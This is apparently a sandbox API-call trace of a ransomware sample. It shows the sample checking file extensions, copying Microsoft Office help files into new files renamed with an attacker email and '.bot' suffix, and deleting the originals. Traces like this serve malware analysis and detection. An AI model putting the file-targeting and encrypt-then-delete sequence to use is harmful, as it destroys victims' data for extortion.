	[0148.108] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0148.108] lstrlenW (lpString=".docx") returned 5
	[0148.108] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0148.108] lstrlenW (lpString=".pdf") returned 4
	[0148.108] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0148.108] lstrlenW (lpString=".xls") returned 4
	[0148.108] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0148.108] lstrlenW (lpString=".xlsx") returned 5
	[0148.108] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0148.108] lstrlenW (lpString=".ppt") returned 4
	[0148.108] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0148.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK") returned 63
	[0148.108] lstrlenW (lpString=".zip") returned 4
	[0148.108] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0148.108] lstrlenW (lpString=".rar") returned 4
	[0148.108] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0148.108] lstrlenW (lpString=".bz2") returned 4
	[0148.108] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0148.108] lstrlenW (lpString=".7z") returned 3
	[0148.109] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0148.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK") returned 63
	[0148.109] lstrlenW (lpString=".dbf") returned 4
	[0148.109] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0148.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK") returned 63
	[0148.109] lstrlenW (lpString=".1cd") returned 4
	[0148.109] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0148.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK") returned 63
	[0148.109] lstrlenW (lpString=".jpg") returned 4
	[0148.109] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0148.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK") returned 63
	[0148.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK") returned 63
	[0148.109] lstrlenW (lpString=".doc") returned 4
	[0148.109] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0148.109] lstrlenW (lpString=".docx") returned 5
	[0148.109] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0148.109] lstrlenW (lpString=".pdf") returned 4
	[0148.109] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0148.109] lstrlenW (lpString=".xls") returned 4
	[0148.109] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0148.109] lstrlenW (lpString=".xlsx") returned 5
	[0148.109] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0148.109] lstrlenW (lpString=".ppt") returned 4
	[0148.109] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0148.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK") returned 63
	[0148.109] lstrlenW (lpString=".zip") returned 4
	[0148.109] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0148.109] lstrlenW (lpString=".rar") returned 4
	[0148.109] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0148.109] lstrlenW (lpString=".bz2") returned 4
	[0148.109] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0148.109] lstrlenW (lpString=".7z") returned 3
	[0148.110] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0148.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK") returned 63
	[0148.110] lstrlenW (lpString=".dbf") returned 4
	[0148.110] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0148.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK") returned 63
	[0148.110] lstrlenW (lpString=".1cd") returned 4
	[0148.110] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0148.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK") returned 63
	[0148.110] lstrlenW (lpString=".jpg") returned 4
	[0148.110] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0148.110] lstrcmpiW (lpString1=".HXS", lpString2=".bot") returned 1
	[0148.110] lstrlenW (lpString="MSPUB.DEV.HXS") returned 13
	[0148.110] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0148.110] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=4750792) returned 1
	[0148.111] CloseHandle (hObject=0x3b0) returned 1
	[0148.111] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev.hxs")) returned 0x20
	[0148.111] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.111] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0148.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS") returned 61
	[0148.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS") returned 61
	[0148.111] lstrlenW (lpString=".doc") returned 4
	[0148.111] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0148.111] lstrlenW (lpString=".docx") returned 5
	[0148.111] lstrcmpiW (lpString1=".docx", lpString2="V.HXS") returned -1
	[0148.111] lstrlenW (lpString=".pdf") returned 4
	[0148.111] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0148.111] lstrlenW (lpString=".xls") returned 4
	[0148.111] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0148.111] lstrlenW (lpString=".xlsx") returned 5
	[0148.111] lstrcmpiW (lpString1=".xlsx", lpString2="V.HXS") returned -1
	[0148.111] lstrlenW (lpString=".ppt") returned 4
	[0148.111] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0148.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS") returned 61
	[0148.111] lstrlenW (lpString=".zip") returned 4
	[0148.111] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0148.111] lstrlenW (lpString=".rar") returned 4
	[0148.112] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0148.112] lstrlenW (lpString=".bz2") returned 4
	[0148.112] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0148.112] lstrlenW (lpString=".7z") returned 3
	[0148.112] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0148.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS") returned 61
	[0148.112] lstrlenW (lpString=".dbf") returned 4
	[0148.112] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0148.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS") returned 61
	[0148.112] lstrlenW (lpString=".1cd") returned 4
	[0148.112] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0148.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS") returned 61
	[0148.112] lstrlenW (lpString=".jpg") returned 4
	[0148.112] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0148.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS") returned 61
	[0148.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS") returned 61
	[0148.112] lstrlenW (lpString=".doc") returned 4
	[0148.112] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0148.112] lstrlenW (lpString=".docx") returned 5
	[0148.112] lstrcmpiW (lpString1=".docx", lpString2="V.HXS") returned -1
	[0148.112] lstrlenW (lpString=".pdf") returned 4
	[0148.112] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0148.112] lstrlenW (lpString=".xls") returned 4
	[0148.112] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0148.112] lstrlenW (lpString=".xlsx") returned 5
	[0148.112] lstrcmpiW (lpString1=".xlsx", lpString2="V.HXS") returned -1
	[0148.112] lstrlenW (lpString=".ppt") returned 4
	[0148.112] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0148.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS") returned 61
	[0148.112] lstrlenW (lpString=".zip") returned 4
	[0148.112] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0148.112] lstrlenW (lpString=".rar") returned 4
	[0148.113] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0148.113] lstrlenW (lpString=".bz2") returned 4
	[0148.113] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0148.113] lstrlenW (lpString=".7z") returned 3
	[0148.113] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0148.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS") returned 61
	[0148.113] lstrlenW (lpString=".dbf") returned 4
	[0148.113] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0148.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS") returned 61
	[0148.113] lstrlenW (lpString=".1cd") returned 4
	[0148.113] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0148.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS") returned 61
	[0148.113] lstrlenW (lpString=".jpg") returned 4
	[0148.113] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0148.113] lstrcmpiW (lpString1=".HXC", lpString2=".bot") returned 1
	[0148.113] lstrlenW (lpString="MSPUB.DEV_COL.HXC") returned 17
	[0148.113] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0148.114] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=641) returned 1
	[0148.114] CloseHandle (hObject=0x3b0) returned 1
	[0148.114] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev_col.hxc")) returned 0x20
	[0148.114] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev_col.hxc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.114] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0148.114] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.114] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.115] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev_col.hxc.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0148.115] GetLastError () returned 0x0
	[0148.115] ReadFile (in: hFile=0x3b0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x281, lpOverlapped=0x0) returned 1
	[0148.117] WriteFile (in: hFile=0x388, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x290, lpOverlapped=0x0) returned 1
	[0148.118] ReadFile (in: hFile=0x3b0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.118] WriteFile (in: hFile=0x388, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xf6, lpOverlapped=0x0) returned 1
	[0148.118] SetEndOfFile (hFile=0x388) returned 1
	[0148.118] CloseHandle (hObject=0x388) returned 1
	[0148.118] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.118] SetEndOfFile (hFile=0x3b0) returned 1
	[0148.120] CloseHandle (hObject=0x3b0) returned 1
	[0148.120] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.126] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev_col.hxc")) returned 1
	[0148.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC") returned 65
	[0148.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC") returned 65
	[0148.127] lstrlenW (lpString=".doc") returned 4
	[0148.127] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0148.127] lstrlenW (lpString=".docx") returned 5
	[0148.127] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0148.127] lstrlenW (lpString=".pdf") returned 4
	[0148.127] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0148.127] lstrlenW (lpString=".xls") returned 4
	[0148.127] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0148.127] lstrlenW (lpString=".xlsx") returned 5
	[0148.127] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0148.127] lstrlenW (lpString=".ppt") returned 4
	[0148.127] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0148.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC") returned 65
	[0148.127] lstrlenW (lpString=".zip") returned 4
	[0148.127] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0148.127] lstrlenW (lpString=".rar") returned 4
	[0148.127] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0148.127] lstrlenW (lpString=".bz2") returned 4
	[0148.127] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0148.127] lstrlenW (lpString=".7z") returned 3
	[0148.127] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0148.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC") returned 65
	[0148.127] lstrlenW (lpString=".dbf") returned 4
	[0148.127] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0148.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC") returned 65
	[0148.127] lstrlenW (lpString=".1cd") returned 4
	[0148.127] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0148.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC") returned 65
	[0148.127] lstrlenW (lpString=".jpg") returned 4
	[0148.127] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0148.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC") returned 65
	[0148.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC") returned 65
	[0148.128] lstrlenW (lpString=".doc") returned 4
	[0148.128] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0148.128] lstrlenW (lpString=".docx") returned 5
	[0148.128] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0148.128] lstrlenW (lpString=".pdf") returned 4
	[0148.128] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0148.128] lstrlenW (lpString=".xls") returned 4
	[0148.128] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0148.128] lstrlenW (lpString=".xlsx") returned 5
	[0148.128] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0148.128] lstrlenW (lpString=".ppt") returned 4
	[0148.128] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0148.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC") returned 65
	[0148.128] lstrlenW (lpString=".zip") returned 4
	[0148.128] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0148.128] lstrlenW (lpString=".rar") returned 4
	[0148.128] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0148.128] lstrlenW (lpString=".bz2") returned 4
	[0148.128] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0148.128] lstrlenW (lpString=".7z") returned 3
	[0148.128] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0148.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC") returned 65
	[0148.128] lstrlenW (lpString=".dbf") returned 4
	[0148.128] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0148.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC") returned 65
	[0148.128] lstrlenW (lpString=".1cd") returned 4
	[0148.128] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0148.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC") returned 65
	[0148.128] lstrlenW (lpString=".jpg") returned 4
	[0148.129] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0148.129] lstrcmpiW (lpString1=".HXT", lpString2=".bot") returned 1
	[0148.129] lstrlenW (lpString="MSPUB.DEV_COL.HXT") returned 17
	[0148.129] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0148.193] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=209) returned 1
	[0148.193] CloseHandle (hObject=0x384) returned 1
	[0148.193] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev_col.hxt")) returned 0x20
	[0148.193] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev_col.hxt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.194] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0148.194] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.194] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.194] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev_col.hxt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0148.195] GetLastError () returned 0x0
	[0148.195] ReadFile (in: hFile=0x384, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0xd1, lpOverlapped=0x0) returned 1
	[0148.250] WriteFile (in: hFile=0x3b4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe0, lpOverlapped=0x0) returned 1
	[0148.251] ReadFile (in: hFile=0x384, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.252] WriteFile (in: hFile=0x3b4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xf6, lpOverlapped=0x0) returned 1
	[0148.252] SetEndOfFile (hFile=0x3b4) returned 1
	[0148.252] CloseHandle (hObject=0x3b4) returned 1
	[0148.252] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.252] SetEndOfFile (hFile=0x384) returned 1
	[0148.254] CloseHandle (hObject=0x384) returned 1
	[0148.254] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.255] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev_col.hxt")) returned 1
	[0148.255] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXT") returned 65
	[0148.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXT") returned 65
	[0148.256] lstrlenW (lpString=".doc") returned 4
	[0148.256] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0148.256] lstrlenW (lpString=".docx") returned 5
	[0148.256] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0148.256] lstrlenW (lpString=".pdf") returned 4
	[0148.256] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0148.256] lstrlenW (lpString=".xls") returned 4
	[0148.256] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0148.256] lstrlenW (lpString=".xlsx") returned 5
	[0148.256] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0148.256] lstrlenW (lpString=".ppt") returned 4
	[0148.256] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0148.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXT") returned 65
	[0148.256] lstrlenW (lpString=".zip") returned 4
	[0148.256] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0148.256] lstrlenW (lpString=".rar") returned 4
	[0148.256] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0148.256] lstrlenW (lpString=".bz2") returned 4
	[0148.256] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0148.256] lstrlenW (lpString=".7z") returned 3
	[0148.256] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0148.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXT") returned 65
	[0148.256] lstrlenW (lpString=".dbf") returned 4
	[0148.256] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0148.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXT") returned 65
	[0148.256] lstrlenW (lpString=".1cd") returned 4
	[0148.256] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0148.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXT") returned 65
	[0148.256] lstrlenW (lpString=".jpg") returned 4
	[0148.256] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0148.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXT") returned 65
	[0148.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXT") returned 65
	[0148.257] lstrlenW (lpString=".doc") returned 4
	[0148.257] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0148.257] lstrlenW (lpString=".docx") returned 5
	[0148.257] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0148.257] lstrlenW (lpString=".pdf") returned 4
	[0148.257] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0148.257] lstrlenW (lpString=".xls") returned 4
	[0148.257] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0148.257] lstrlenW (lpString=".xlsx") returned 5
	[0148.257] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0148.257] lstrlenW (lpString=".ppt") returned 4
